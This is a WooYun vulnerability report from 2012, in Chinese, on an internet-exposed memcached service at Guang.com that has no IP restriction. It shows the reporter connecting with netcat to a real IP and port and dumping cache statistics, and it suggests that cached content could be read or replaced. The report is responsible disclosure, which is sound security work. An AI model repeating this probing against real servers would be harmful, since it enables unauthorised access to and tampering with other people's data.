漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-04966
漏洞标题:"逛"网memcached未作IP限制造成cache泄露
相关厂商:Guang.Com
漏洞作者: ReJeCt
提交时间:2012-03-02 13:05
修复时间:2012-04-16 13:06
公开时间:2012-04-16 13:06
漏洞类型:系统/服务运维配置不当
危害等级:高
自评Rank:10
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-03-02: 积极联系厂商并且等待厂商认领中,细节不对外公开
2012-04-16: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
memcached配置不当,导致服务暴露在外网。
详细说明:
C:\Windows\System32>C:\Users\ReJeCt\Desktop\nc.exe -vv 122.225.68.78 20011
122.225.68.78: 反向连接查询主机: h_errno 11004: 无数据
(UNKNOWN) [122.225.68.78] 20011 (?) 打开
stats items
STAT items:0:number 162752
STAT items:0:age 5057332
STAT items:0:evicted 3045158928
STAT items:0:evicted_nonzero 10922
STAT items:0:evicted_time 0
STAT items:0:outofmemory 0
STAT items:0:tailrepairs 0
STAT items:0:reclaimed 0
STAT items:1:number 163342
STAT items:1:age 88163
STAT items:1:evicted 11836
STAT items:1:evicted_nonzero 11836
STAT items:1:evicted_time 3597
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 22786
END
漏洞证明:
可以获取到相应cache数据,恶意者可以从中replace掉内容或干嘛的
ps:该ip另开有N个memcached服务端口 均会有不同的安全隐患。
修复方案:
限制ip 屏蔽掉外网访问,都懂得额.
版权声明:转载请注明来源 ReJeCt@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝